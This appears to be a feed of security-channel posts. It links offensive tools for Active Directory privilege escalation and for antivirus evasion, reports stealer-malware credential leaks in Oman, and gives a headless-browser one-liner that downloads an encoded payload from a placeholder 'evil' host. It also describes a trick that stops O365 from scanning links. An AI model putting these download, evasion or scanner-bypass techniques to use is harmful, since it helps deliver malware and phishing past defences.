January 7, 2022 at 01:40AM

■■■■□ Tool: BloodyAD, an Active Directory Privilege Escalation Framework, it can be used manually using bloodyAD.py or automatically by combining pathgen.py and autobloody.py. https://github.com/CravateRouge/bloodyAD https://t.me/cKure/10504

January 6, 2022 at 05:06PM

■■■■□ Bluffy: Bypass Anti-Virus products by formatting shellcode into realistic looking data formats. https://securityonline.info/bluffy-bypass-anti-virus-formatting-shellcode/ https://t.me/cKure/10503

January 5, 2022 at 07:40PM

■■□□□ Stealer Malware Intelligence Report – Oman 615 of Omani users has been infected with Stealer (Redline, Raccoon, Vidar, etc). 2,567 of credentials that access to .om domains are leaked from the users and are distributed on Dark and Deep Web. https://t.me/cKure/10496

January 5, 2022 at 01:56PM

■■■■□ Another way to download files using msedge/chrome: [msedge.exe | chrome.exe] –headless –enable-logging –disable-gpu –dump-dom “http://server/evil.b64.html” > out.b64 – Downloaded file should end with .html. – Binaries should be encoded. https://twitter.com/mrd0x/status/1478234484881436672 https://t.me/cKure/10494

January 5, 2022 at 12:22AM

■■■□□ Interesting thread! If you compose an email using the “Reply” function on O365 which has a link, intercept the request and add an extra empty href attribute then O365 won’t scan the link anymore. click ==> junk click ==> inbox https://twitter.com/mrd0x/status/1475177065204834311 https://t.me/cKure/10493